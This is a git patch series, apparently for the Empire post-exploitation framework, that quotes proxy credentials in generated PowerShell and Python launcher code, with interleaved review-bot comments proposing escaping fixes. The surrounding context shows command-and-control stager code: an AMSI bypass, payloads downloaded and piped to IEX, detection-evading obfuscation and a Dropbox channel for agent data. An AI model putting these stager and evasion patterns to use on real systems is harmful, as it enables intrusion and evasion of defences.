From 6f59ee7b34eb90af86cfa35b637efb1cc79e78f5 Mon Sep 17 00:00:00 2001
From: Dirkjan Mollema
Date: Thu, 28 Sep 2017 16:53:11 +0200
Subject: [PATCH 1/2] Fixed custom proxy config in launcher code
---
 lib/listeners/http.py | 28 ++++++++++++++--------------
 lib/listeners/http_foreign.py | 14 +++++++-------
 lib/listeners/http_hop.py | 8 ++++----
 3 files changed, 25 insertions(+), 25 deletions(-)
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index 5a1c4d1..d473beb 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -243,7 +243,7 @@ class Listener:
             password = proxyCreds.split(':')[1]
             domain = username.split('\\')[0]
             usr = username.split('\\')[1]
-            stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
+            stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
             stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
             #save the proxy settings to use during the entire staging process and the agent
@@ -259,7 +259,7 @@ class Listener:
             if "https" in host:
                 host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
             else:
-                host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
+                host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
             # code to turn the key string into a byte array
             stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
@@ -291,7 +291,7 @@ class Listener:
             # decode everything and kick it over to IEX to kick off execution
             stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
-
+
             if obfuscate:
                 stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
             # base64 encode the stager and return it
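Review bot: The added single quotes on the `$netcred` line make the generated PowerShell literal well-formed only for values that contain no `'`; a username, password or domain with a `'` in it still terminates the literal, and `password = proxyCreds.split(':')[1]` on the line above drops everything after a second `:` in the password. PowerShell escapes `'` inside a single-quoted string as `''`, so the values can be made safe before interpolation: `password = proxyCreds.split(':', 1)[1]` and, immediately before the `stager +=` line, `usr, password, domain = [v.replace("'", "''") for v in (usr, password, domain)]`. `usr = username.split('\\')[1]` also raises IndexError when the username carries no `DOMAIN\` prefix, which is worth checking against how proxyCreds is validated elsewhere. The same lines recur in http_foreign.py @@ -198, http_hop.py @@ -176 and dbx.py @@ -222; the enclosing method starts and ends outside this hunk.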
@@ -333,7 +333,7 @@ class Listener:
             # prebuild the request routing packet for the launcher
             routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
             b64RoutingPacket = base64.b64encode(routingPacket)
-
+
             launcherBase += "req=urllib2.Request(server+t);\n"
             # add the RC4 packet to a cookie
             launcherBase += "req.add_header('User-Agent',UA);\n"
@@ -347,7 +347,7 @@ class Listener:
                 #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
                 launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
-
+
             if proxy.lower() != "none":
                 if proxy.lower() == "default":
                     launcherBase += "proxy = urllib2.ProxyHandler();\n"
@@ -362,7 +362,7 @@ class Listener:
                     launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
                     username = proxyCreds.split(':')[0]
                     password = proxyCreds.split(':')[1]
-                    launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
+                    launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
                     launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
                 else:
                     launcherBase += "o = urllib2.build_opener(proxy);\n"
@@ -373,7 +373,7 @@ class Listener:
                 launcherBase += "urllib2.install_opener(o);\n"
             # download the stager and extract the IV
-
+
             launcherBase += "a=urllib2.urlopen(req).read();\n"
             launcherBase += "IV=a[0:4];"
             launcherBase += "data=a[4:];"
@@ -414,8 +414,8 @@ class Listener:
         if not language:
             print helpers.color('[!] listeners/http generate_stager(): no language specified!')
             return None
-
-
+
+
         profile = listenerOptions['DefaultProfile']['Value']
         uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
         launcher = listenerOptions['Launcher']['Value']
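Review bot: The new `add_password` line quotes `proxy`, `username` and `password` but does not escape them for the Python launcher it is building, so a value containing `'` or `\` produces a SyntaxError in the generated code, and `password = proxyCreds.split(':')[1]` just above still truncates a password that contains `:`. Because the launcher is Python 2 source, `%r` yields a valid string literal for any `str` or `unicode` value (assuming these options are not some other type): `password = proxyCreds.split(':', 1)[1]` and `launcherBase += "proxy_auth_handler.add_password(None,%r,%r,%r);\n" % (proxy, username, password)`. The same lines recur in http_foreign.py @@ -294, http_hop.py @@ -262 and dbx.py @@ -307. The enclosing method starts and ends outside this hunk.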
@@ -470,7 +470,7 @@ class Listener:
                 randomizedStager += helpers.randomize_capitalization(line)
             else:
                 randomizedStager += line
-
+
         if obfuscate:
             randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
         # base64 encode the stager and return it
@@ -633,7 +633,7 @@ class Listener:
             if($Script:Proxy) {
                 $wc.Proxy = $Script:Proxy;
             }
-
+
             $wc.Headers.Add("User-Agent",$script:UserAgent)
             $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
             $wc.Headers.Add("Cookie", "session=$RoutingCookie")
@@ -675,7 +675,7 @@ class Listener:
             if($Script:Proxy) {
                 $wc.Proxy = $Script:Proxy;
             }
-
+
             $wc.Headers.Add('User-Agent', $Script:UserAgent)
             $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
@@ -778,7 +778,7 @@ def send_message(packets=None):
         app = Flask(__name__)
         self.app = app
-
+
         @app.route('/')
         def send_stager(stagerURI):
             if stagerURI:
@@ -982,4 +982,4 @@ def send_message(packets=None):
             self.threads[name].kill()
         else:
             print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
-            self.threads[self.options['Name']['Value']].kill()
\ No newline at end of file
+            self.threads[self.options['Name']['Value']].kill()
diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py
index c72fd6c..557626e 100644
--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -141,7 +141,7 @@ class Listener:
         uris = [a for a in profile.split('|')[0].split(',')]
         stage0 = random.choice(uris)
         customHeaders = profile.split('|')[2:]
-
+
         if language.startswith('po'):
             # PowerShell
@@ -164,7 +164,7 @@ class Listener:
             stager += "'amsiInitFailed','NonPublic,Static'"
             stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
             stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
-
+
             stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
             if userAgent.lower() == 'default':
@@ -198,7 +198,7 @@ class Listener:
             password = proxyCreds.split(':')[1]
             domain = username.split('\\')[0]
             usr = username.split('\\')[1]
-            stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
+            stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
             stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
             # TODO: reimplement stager retries?
@@ -210,7 +210,7 @@ class Listener:
                 headerValue = header.split(':')[1]
                 stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                 stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
-
+
             # code to turn the key string into a byte array
             stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
             stager += "'%s');" % (stagingKey)
@@ -294,7 +294,7 @@ class Listener:
                     launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
                     username = proxyCreds.split(':')[0]
                     password = proxyCreds.split(':')[1]
-                    launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
+                    launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
                     launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
                 else:
                     launcherBase += "o = urllib2.build_opener(proxy);\n"
@@ -363,12 +363,12 @@ class Listener:
         if language:
             if language.lower() == 'powershell':
-
+
                 updateServers = """
                 $Script:ControlServers = @("%s");
                 $Script:ServerIndex = 0;
                 """ % (listenerOptions['Host']['Value'])
-
+
                 getTask = """
                     function script:Get-Task {
diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py
index 21dbdc9..c5a7757 100644
--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -176,7 +176,7 @@ class Listener:
             password = proxyCreds.split(':')[1]
             domain = username.split('\\')[0]
             usr = username.split('\\')[1]
-            stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
+            stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
             stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
             # TODO: reimplement stager retries?
@@ -247,7 +247,7 @@ class Listener:
             # add the RC4 packet to a cookie
             launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
             launcherBase += "import urllib2\n"
-
+
             if proxy.lower() != "none":
                 if proxy.lower() == "default":
                     launcherBase += "proxy = urllib2.ProxyHandler();\n"
@@ -262,7 +262,7 @@ class Listener:
                     launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
                     username = proxyCreds.split(':')[0]
                     password = proxyCreds.split(':')[1]
-                    launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
+                    launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
                     launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
                 else:
                     launcherBase += "o = urllib2.build_opener(proxy);\n"
@@ -271,7 +271,7 @@ class Listener:
                 #install proxy and creds globally, so they can be used with urlopen.
                 launcherBase += "urllib2.install_opener(o);\n"
-
+
             # download the stager and extract the IV
             launcherBase += "a=o.open(server+t).read();"
             launcherBase += "IV=a[0:4];"
From effe3954e1cf103c8882acad97bafce3cc92222b Mon Sep 17 00:00:00 2001
From: Dirkjan Mollema
Date: Thu, 28 Sep 2017 17:11:32 +0200
Subject: [PATCH 2/2] Also fixed proxy in dbx.py
---
 lib/listeners/dbx.py | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py
index d0b644c..5bf5d73 100755
--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
@@ -222,7 +222,7 @@ class Listener:
             password = proxyCreds.split(':')[1]
             domain = username.split('\\')[0]
             usr = username.split('\\')[1]
-            stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
+            stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
             stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
             #save the proxy settings to use during the entire staging process and the agent
@@ -307,7 +307,7 @@ class Listener:
                     launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
                     username = proxyCreds.split(':')[0]
                     password = proxyCreds.split(':')[1]
-                    launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
+                    launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
                     launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
                 else:
                     launcherBase += "o = urllib2.build_opener(proxy);\n"
@@ -484,7 +484,7 @@ class Listener:
             #strip out comments and blank lines
             code = helpers.strip_python_comments(code)
-            #patch some more
+            #patch some more
             code = code.replace('delay = 60', 'delay = %s' % (delay))
             code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
             code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
@@ -661,16 +661,16 @@ def send_message(packets=None):
             except:
                 pass
-
+
             if packets:
                 data = ''.join(packets)
                 # aes_encrypt_then_hmac is in stager.py
                 encData = aes_encrypt_then_hmac(key, data)
                 data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
             #check to see if there are any results already present
-
+
             headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
-
+
             try:
                 pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
             except:
@@ -953,7 +953,7 @@ def send_message(packets=None):
                     dbx.files_delete(fileName)
                 except dropbox.exceptions.ApiError:
                     dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox")
-
+
             self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)